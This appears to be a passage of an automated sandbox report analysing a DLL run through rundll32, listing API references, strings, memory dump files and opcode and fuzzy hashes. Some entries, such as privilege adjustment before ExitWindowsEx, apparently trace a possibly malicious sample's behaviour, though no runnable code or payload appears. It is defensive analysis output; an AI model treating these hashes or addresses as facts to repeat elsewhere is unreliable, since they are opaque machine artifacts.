                    • Opcode ID: 14b17a4b88f3e6b77282140b40bb5bf452a629801ca5740cb9b4a38c41233d0f
                    • Instruction ID: 0de9fcde0ce06a8ec983f84e7f887d5372b6bd8b08b4f9d019eb4628c1e418df
                    • Opcode Fuzzy Hash: 14b17a4b88f3e6b77282140b40bb5bf452a629801ca5740cb9b4a38c41233d0f
                    • Instruction Fuzzy Hash: CCE04F3190866CFBDF126F61CC08BAE3E39EF4AB60F454015FD1466161CB33D9219AE5
                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 6D047101
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 6D04711A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$AcquireContextCreateHash
                    • String ID:
                    • API String ID: 1914063823-0
                    • Opcode ID: 9f020effcde5153b2c3674aa8f10c9c1a8fc295e4e5b03a41c42cf3a2b5b2011
                    • Instruction ID: 236b8417f62f4a7eb4a03bc8078e726801b52077d02a41c03a3f7559e55dd352
                    • Opcode Fuzzy Hash: 9f020effcde5153b2c3674aa8f10c9c1a8fc295e4e5b03a41c42cf3a2b5b2011
                    • Instruction Fuzzy Hash: 9BE01731288220BAFA205B119C06F9A77A8AB0AB10F208514B340FA0D0C7A1A4008BA8
                    Strings
                    • Can't get the size of %s, xrefs: 6D02A2AC
                    • Can't open %s for writing, xrefs: 6D02A238
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: Can't get the size of %s$Can't open %s for writing
                    • API String ID: 0-3544860555
                    • Opcode ID: 9a9dd1f8ce7d33c376ef7a972b3edacafec9cff7952e24206d1a638e5b23bf7e
                    • Instruction ID: 129098c9452279ab4ccd5c890eaa00da73bad808c2061f55fac291fab1333a4d
                    • Opcode Fuzzy Hash: 9a9dd1f8ce7d33c376ef7a972b3edacafec9cff7952e24206d1a638e5b23bf7e
                    • Instruction Fuzzy Hash: 0281B671A097019BF700DB68DC81F6AB7E5FFC8218F54493DF65983241EF26A958C782
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D05D7A1,?,?,00000008,?,?,6D06E72F,00000000), ref: 6D05D9D3
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 8c849dba4c9964585384d8ade5b9f67bb1aed2d21f9fa5e71076d4c2e1acc477
                    • Instruction ID: d9e3ed215615e9c1d7754e5639b88eba327944da2ebeac6715b701b1233a8c40
                    • Opcode Fuzzy Hash: 8c849dba4c9964585384d8ade5b9f67bb1aed2d21f9fa5e71076d4c2e1acc477
                    • Instruction Fuzzy Hash: 49B15E315206099FE705CF28C586BA57BE0FF85364F258699ECE9CF2A1C336D9A1CB50
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D049172
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: ffd4bb1c1d4d9fa69074003c1c5dfed34b787c39c9d4bfc72e27c7fb60087230
                    • Instruction ID: 9003d52a3939ea164f745f719232eb678a96f9601458816df0cd13750870ad4e
                    • Opcode Fuzzy Hash: ffd4bb1c1d4d9fa69074003c1c5dfed34b787c39c9d4bfc72e27c7fb60087230
                    • Instruction Fuzzy Hash: 0FA148B1D01605CBEF04DF54E6A5BAABBF0FB8A765F24813EE415EB680D3749940CB50
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dfb22b6a1b75882612aa6ee9201d4606f6148f6f3959486b854e4901ae954902
                    • Instruction ID: c557f5b71c260e1926e30a2f165000561053bcd5dc9956d054d6ce7c1a178164
                    • Opcode Fuzzy Hash: dfb22b6a1b75882612aa6ee9201d4606f6148f6f3959486b854e4901ae954902
                    • Instruction Fuzzy Hash: 714194B580425DAFDB10DF69CC88BEABBB9EF45304F5442D9E519A3200DB319E448F60
                    APIs
                    • BCryptGenRandom.BCRYPT(00000000,?), ref: 6D01C7FF
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CryptRandom
                    • String ID:
                    • API String ID: 2662593985-0
                    • Opcode ID: 49e35172a62acfb489d07b117e99d6aa5324693e95b7ec1bfc9bcdd5dfb1405f
                    • Instruction ID: 370677b6cf93b3ac9409b256136a67f191c8e0fa04d152161a7ac7b59e0652e6
                    • Opcode Fuzzy Hash: 49e35172a62acfb489d07b117e99d6aa5324693e95b7ec1bfc9bcdd5dfb1405f
                    • Instruction Fuzzy Hash: E641E27160C3469FF724CE68C891B7AB7E1EB86304F44843EE899C7282DB75C8488796
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B854
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    • API String ID: 3736152602-0
                    • Opcode ID: 88a58c7310eaf56a8af90d17bcb7c92f1262e92dc8725ad7a55bcbf22c2df9d3
                    • Instruction ID: 9a1d04c28dadf7d5ade4e468ec585a299a2441fcacff05177f30a250bd248604
                    • Opcode Fuzzy Hash: 88a58c7310eaf56a8af90d17bcb7c92f1262e92dc8725ad7a55bcbf22c2df9d3
                    • Instruction Fuzzy Hash: 56218EB2618296AFFB189B29D851BBA77F8EF45314B14407AFE01D7180EB75E940CB60
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 9ec18a7984f13714760f87a49dcbbddfa205da87c1b2d10fe5b7ee4f10c0f536
                    • Instruction ID: 0f2bfd56f108e748e6f8089496d5008ac8b2a10274945b92a1bf1b10a8be4344
                    • Opcode Fuzzy Hash: 9ec18a7984f13714760f87a49dcbbddfa205da87c1b2d10fe5b7ee4f10c0f536
                    • Instruction Fuzzy Hash: 84C1DB34A08687DEF711CF68C590F7ABFF9BB46314F00C679D962976A0C721A946CB50
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • EnumSystemLocalesW.KERNEL32(6D06B5AD,00000001,00000000,?,-00000050,?,6D06BBE1,00000000,?,?,?,00000055,?), ref: 6D06B4F9
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 1ae4b4ba872e613f0a4beae482ff7069fb674afe6eb3d3eef5914ac4d5cf4029
                    • Instruction ID: f2f10f28db703b1becc49c2c174a633781f86b05afacc632ce9139cfd527cb3c
                    • Opcode Fuzzy Hash: 1ae4b4ba872e613f0a4beae482ff7069fb674afe6eb3d3eef5914ac4d5cf4029
                    • Instruction Fuzzy Hash: E111E9762047055FEB189F39C8A07BAB7A1FF84369B15452CE94687A40E371A543C750
                    APIs
                    • BCryptGenRandom.BCRYPT(00000000,?), ref: 6D01C6EC
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CryptRandom
                    • String ID:
                    • API String ID: 2662593985-0
                    • Opcode ID: ab48ef06829b1e9ac0176133a97703d53b63b35dfdc05384b7432a00acc22324
                    • Instruction ID: b004d9c1816027ec0a1293f9bceab382e9dffb359c95302ce47ec3763600d38c
                    • Opcode Fuzzy Hash: ab48ef06829b1e9ac0176133a97703d53b63b35dfdc05384b7432a00acc22324
                    • Instruction Fuzzy Hash: 921102B160C3069AF704CE65D891B3BB7F8EBC6714F00053EEA42C7280D7B0D8468B5A
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D06B7C9,00000000,00000000,?), ref: 6D06BA5B
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    • API String ID: 3736152602-0
                    • Opcode ID: 33200279aff37195c1648dbdc80b6b0796542b15beac1c2967324dcb56b6fcf9
                    • Instruction ID: c76df9c5634aa2b3ff789cbdec2f00f6a9899a850f7b29da076ef94ab2ef94b6
                    • Opcode Fuzzy Hash: 33200279aff37195c1648dbdc80b6b0796542b15beac1c2967324dcb56b6fcf9
                    • Instruction Fuzzy Hash: A101F9B2A14157BFFB189B6588467FE37A8FB40354F014429FD16A7180EA70FD41C6B0
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D06B3E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID: utf8
                    • API String ID: 3736152602-905460609
                    • Opcode ID: d1b2ea73d9f11b3fc18ee8e239884f2223eaf32d8e61b23b8e3191c184fd2d84
                    • Instruction ID: 4a0d535287dc85ca3c955ec85d0a4381054313c23d5a055629c1f02e53887ef5
                    • Opcode Fuzzy Hash: d1b2ea73d9f11b3fc18ee8e239884f2223eaf32d8e61b23b8e3191c184fd2d84
                    • Instruction Fuzzy Hash: A6F0F432654245ABEB08AB39D844BBA33ECEB46324F01007AFB06D7280DB74AD058760
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • EnumSystemLocalesW.KERNEL32(6D06B800,00000001,00000002,?,-00000050,?,6D06BBA9,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6D06B56C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: f6675af33ec5acf396cb7dfd09f245ef210476c11b8387053fef1bb09435f262
                    • Instruction ID: 0a32b3bc3fcee0de397a1164c2434a834d7c15614a8650714016e081ee6a5e81
                    • Opcode Fuzzy Hash: f6675af33ec5acf396cb7dfd09f245ef210476c11b8387053fef1bb09435f262
                    • Instruction Fuzzy Hash: FFF0F6762083495FE7145F399880BBA7BE1EF81368B05842CFA454B690E7729942CB60
                    APIs
                      • Part of subcall function 6D051424: EnterCriticalSection.KERNEL32(-0003BF1A,?,6D0608ED,?,6D086D40,00000008,6D060AB1,?,6D04EA46,?,?,6D04EA46,?,?,6D04FC59), ref: 6D051433
                    • EnumSystemLocalesW.KERNEL32(6D062DED,00000001,6D086E60,0000000C,6D063262,00000000), ref: 6D062E32
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: f0e4e1de8c8f9700618fdfdded0b2db7d172e2f10e3221f57493261cb22c2045
                    • Instruction ID: c2ce7c1f691083ec060b1ed1b5377f2f3c086a7bdd9900e0eedf05d911498ff1
                    • Opcode Fuzzy Hash: f0e4e1de8c8f9700618fdfdded0b2db7d172e2f10e3221f57493261cb22c2045
                    • Instruction Fuzzy Hash: 1CF04976A04214EFEB10DFA9D400B9C77F0EB46325F11812AE510AB2D1DB755900CF50
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • EnumSystemLocalesW.KERNEL32(6D06B395,00000001,00000002,?,?,6D06BC03,-00000050,?,?,?,00000055,?,-00000050,?,?,00000002), ref: 6D06B473
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: eb96275dd3a3b40a2d4a25a8e25fa12134f0281c9b348235524bc619bf3556af
                    • Instruction ID: bf66f7a8ff41683289dff6ba2c617fcb41c5a323e9c79d5af15692330092ba9c
                    • Opcode Fuzzy Hash: eb96275dd3a3b40a2d4a25a8e25fa12134f0281c9b348235524bc619bf3556af
                    • Instruction Fuzzy Hash: 19F0E53630824557DB049F3AD85476ABFA5EFC2724B074059FF098B680D6B19982D7A0
                    APIs
                    • BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 6D01C8EE
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CryptRandom
                    • String ID:
                    • API String ID: 2662593985-0
                    • Opcode ID: f8b007f93f9d3c4f250129a8cf06282ee7b479751a796d7f7b0bca16e9284948
                    • Instruction ID: 3052fbfb8a65fe4a48bec1831a012ab24e58706975b102a75ac9ee8f7b3b8f72
                    • Opcode Fuzzy Hash: f8b007f93f9d3c4f250129a8cf06282ee7b479751a796d7f7b0bca16e9284948
                    • Instruction Fuzzy Hash: 6BD0C93A598205BAEB121AA0EC03F0A7B91AB84B18F91C928B359550F1D2B684249702
                    APIs
                      • Part of subcall function 04EC3260: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 04EC327E
                      • Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04EC3292
                      • Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04EC329D
                      • Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04EC32A8
                      • Part of subcall function 04EC3260: LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC32B2
                      • Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC32C1
                    • ExitWindowsEx.USER32(?,00000000), ref: 04EC5944
                      • Part of subcall function 04EC3260: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04EC331B
                      • Part of subcall function 04EC3260: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04EC3327
                      • Part of subcall function 04EC3260: CloseHandle.KERNEL32(?), ref: 04EC3337
                      • Part of subcall function 04EC3260: FreeLibrary.KERNEL32(00000000), ref: 04EC3348
                      • Part of subcall function 04EC3260: FreeLibrary.KERNEL32(?), ref: 04EC3352
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                    • String ID:
                    • API String ID: 3789203340-0
                    • Opcode ID: fe40b52feabcc9b1a2925cb34fc7eff19a4f972b30da4bd50e8c0ab0e4b51ba4
                    • Instruction ID: 8fa57acc3d0756c22d6a0bbb357b3519ebdec945fa7c8f4d26fd01a5c71caa68
                    • Opcode Fuzzy Hash: fe40b52feabcc9b1a2925cb34fc7eff19a4f972b30da4bd50e8c0ab0e4b51ba4
                    • Instruction Fuzzy Hash: 5DC012B120C20827EE0C27B9E80AB9E769CCF04714F10801DB5098A181CC66B4410198
                    APIs
                    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6D0449D1
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CryptDataHash
                    • String ID:
                    • API String ID: 4245837645-0
                    • Opcode ID: b27caecfd4715c4549a451bfa4104a20475345a28dc0dced3c432b39bc7e6436
                    • Instruction ID: 58d4d757c78782ac48ab520d073437364c71dc96ff947bf2b94c5469767731c8
                    • Opcode Fuzzy Hash: b27caecfd4715c4549a451bfa4104a20475345a28dc0dced3c432b39bc7e6436
                    • Instruction Fuzzy Hash: B9C04C31108345AFCF11CF40CD05F1DBBB1BB85700F144C48B29455060C372D414EB01
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %lx
                    • API String ID: 0-1448181948
                    • Opcode ID: b80a918e34f723396fe975ad405a71951f6380499df556aa73ae5c0e2959c89b
                    • Instruction ID: ebcf4daeacc23893b0c6d013f5387bd691c57f37ea4b9ada3faf33d7d771d256
                    • Opcode Fuzzy Hash: b80a918e34f723396fe975ad405a71951f6380499df556aa73ae5c0e2959c89b
                    • Instruction Fuzzy Hash: 4A81E632E087638BE715CE2CC48036EB7E1ABC9324F164B2DE5A5872D5E7719949C782
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
